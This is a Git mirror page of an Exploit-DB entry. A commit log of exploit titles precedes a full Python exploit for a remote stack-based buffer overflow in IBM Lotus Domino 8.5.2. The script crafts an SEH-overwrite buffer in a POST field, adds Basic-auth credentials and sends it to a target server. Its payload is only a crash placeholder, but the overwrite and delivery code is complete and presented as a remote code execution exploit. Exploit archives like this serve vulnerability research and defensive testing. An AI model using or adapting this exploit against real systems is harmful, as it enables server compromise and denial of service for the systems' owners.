bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/windows/remote/36145.py
Offensive Security 880bbe402e DB: 2019-03-08 
14991 changes to exploits/shellcodes

HTC Touch - vCard over IP Denial of Service

TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities

PeerBlock 1.1 - Blue Screen of Death

WS10 Data Server - SCADA Overflow (PoC)

Symantec Endpoint Protection 12.1.4013 - Service Disabling
Memcached 1.4.33 - 'Crash' (PoC)
Memcached 1.4.33 - 'Add' (PoC)
Memcached 1.4.33 - 'sasl' (PoC)
Memcached 1.4.33 - 'Crash' (PoC)
Memcached 1.4.33 - 'Add' (PoC)
Memcached 1.4.33 - 'sasl' (PoC)

Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow

man-db 2.4.1 - 'open_cat_stream()' Local uid=man

CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation

CDRecord's ReadCD - Local Privilege Escalation
Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH)
FreeBSD - Intel SYSRET Privilege Escalation (Metasploit)

CCProxy 6.2 - 'ping' Remote Buffer Overflow

Savant Web Server 3.1 - Remote Buffer Overflow (2)

Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow

Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow
QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit)
Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit)
Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit)
Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass)
TeamCity < 9.0.2 - Disabled Registration Bypass
OpenSSH SCP Client - Write Arbitrary Files
Kados R10 GreenBee - Multiple SQL Injection
WordPress Core 5.0 - Remote Code Execution
phpBB 3.2.3  - Remote Code Execution

Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator)
Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
2019-03-08 05:01:50 +00:00

83 lines
No EOL
3.1 KiB
Python
Executable file
Raw Blame History

source: https://www.securityfocus.com/bid/49705/info
IBM Lotus Domino is prone to a remote stack-based buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied input.
Successfully exploiting this issue will allow remote attackers to execute arbitrary code with system-level privileges. Successful exploits will completely compromise affected computers. Failed exploit attempts will result in a denial-of-service condition.
Lotus Domino 8.5.2 is vulnerable; other versions may also be affected.
#!/usr/bin/python
import socket,struct,sys,os
host="192.168.x.y" #server ip here!
cookie="1234567890abcdef" #Set your Cookie credential here! Cookie = base64((usr:pwd))
#Shellcode = Using XOR [reg],reg to crash ("like" INT3 :))
Shellcode=chr(0x30)
server=host,80
SEH=struct.pack("<L",0x60404672) # POP ESI - POP EBP - RETN nnotes.dll.60404672
nSEH=struct.pack("<L",0x4141347A) # INC ecx ;NOP
# INC ecx ;NOP
# JPE slep ;Detour
vars="__Click=0&tHPRAgentName=" #tHPRAgentName => Vulnerable POST variable
buf="A"*436 #sended buffer-nSEH-SEH
slep="X"*46 #pre-shellcode to fix JPE landing
#This function forges our POST request (with our Shellcode sure)
def buildPOST(h,b,c):
P="POST /webadmin.nsf/fmHttpPostRequest?OpenForm&Seq=1 HTTP/1.1\r\n"
P+="Host: "+h+"\r\n"
P+="User-Agent: oh sure\r\n"
P+="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
P+="Accept-Language: chinnese plz\r\n"
P+="Accept-Encoding: gzip,deflate\r\n"
P+="Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
P+="Keep-Alive: 115\r\n"
P+="Connection: keep-alive\r\n"
P+="Referer: http://"+h+"/webadmin.nsf/dlgConfigPorts?ReadForm&objref=16\r\n"
P+="Cookie: CWCweb=\"savedLocale:en\"\r\n"
P+="Authorization: Basic "+c+"\r\n"
P+="Content-Type: application/x-www-form-urlencoded\r\n"
P+="Content-Length: %s\r\n" % str(len(b))
P+="\r\n"
P+=b
return P
def main():
if os.name=="nt":
os.system("cls")
else:
os.system("clear")
print"\t->[ IBM Lotus Domino 8.5.2 Remote Stack Overflow ]<-"
print"\t ->[Remote Code Execution Exploit]<-\n\n"
print"[+] Crafting buffer..."
#Creating POST content data
buffer=vars+buf+nSEH+SEH+slep+Shellcode
print"[+] Connecting to server..."
s=socket.socket()
#Trying connect to IBM Lotus Domino HTTP server
try:
s.connect(server)
#We goin to exit if this fails
except:
print"[-] Error connecting to remote server..."
sys.exit(0)
print"[+] Crafting POST request..."
#Crafting final POST
post=buildPOST(host,buffer,cookie)
print"[+] 0k, sending..."
#Sending Shellcode to remote server
s.send(post)
#Server is running? Some fails :S
try:
print s.recv(2048)
print"[x] Exploit failed!"
#Else we achieve remote code execution successfully
except:
print"[+] Done!"
s.close()
print"\n[*] By @rmallof"
if __name__=="__main__":
main()
Reference in a new issue View git blame Copy permalink